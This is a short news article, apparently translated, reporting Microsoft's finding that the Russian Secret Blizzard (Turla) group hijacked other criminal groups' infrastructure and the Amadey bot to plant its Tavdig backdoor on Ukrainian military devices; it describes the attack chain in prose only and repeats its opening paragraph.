Russian hackers from the Secret Blizzard group, also known as Turla and linked to Russian intelligence, took an unusual route — they appropriated the infrastructure of other cybercriminals and used it to infect the devices of the Ukrainian military on the front lines.
Russian hackers from the Secret Blizzard group, also known as Turla and linked to Russian intelligence, took an unusual route — they appropriated the infrastructure of other cybercriminals and used it to infect the devices of the Ukrainian military on the front lines.
In at least two cases this year, Secret Blizzard hackers used the servers and malware of other cybercriminals to attack Ukrainian military devices, Microsoft said Wednesday.
In one case, hackers used the infrastructure of the hacker group Storm-1919, in another they appropriated the resources of Storm-1837, also Russian hackers who attacked Ukrainian drone operators.
From March to April of this year, the Secret Blizzard group used the Amadey bot that Storm-1919 usually uses for crypto-hacking.
“Secret Blizzard either used Amadey's malware as a service (MaaS) or secretly accessed Amadey's command-and-control panels (C2) to download a PowerShell dropper to target devices. The PowerShell dropper contained a Base64-encoded Amadey payload, supplemented with code that made a request to the Secret Blizzard C2 infrastructure,” Microsoft said.
The ultimate goal was to install Tavdig, a Secret Blizzard backdoor used to conduct intelligence on objects of interest to attackers. In the Amdey sample, Microsoft discovered information collected from device clipboards and passwords collected from browsers. He then installed a special intelligence tool that "selectively deployed on devices of further interest to the threat actor — such as devices originating from Starlink IP addresses," writes Ars Technica.
When hackers decided a target was of high value, Tavdig was installed to collect information, including "user information, network statistics, and installed patches, and to import registry settings to the compromised device."
"It's not uncommon for attackers to use the same tactics or tools, although we rarely see evidence of them compromising and exploiting the infrastructure of other actors," said Sherrod DeGrippo, Director of Threat Intelligence Strategy at Microsoft, in an interview with The Hacker News .
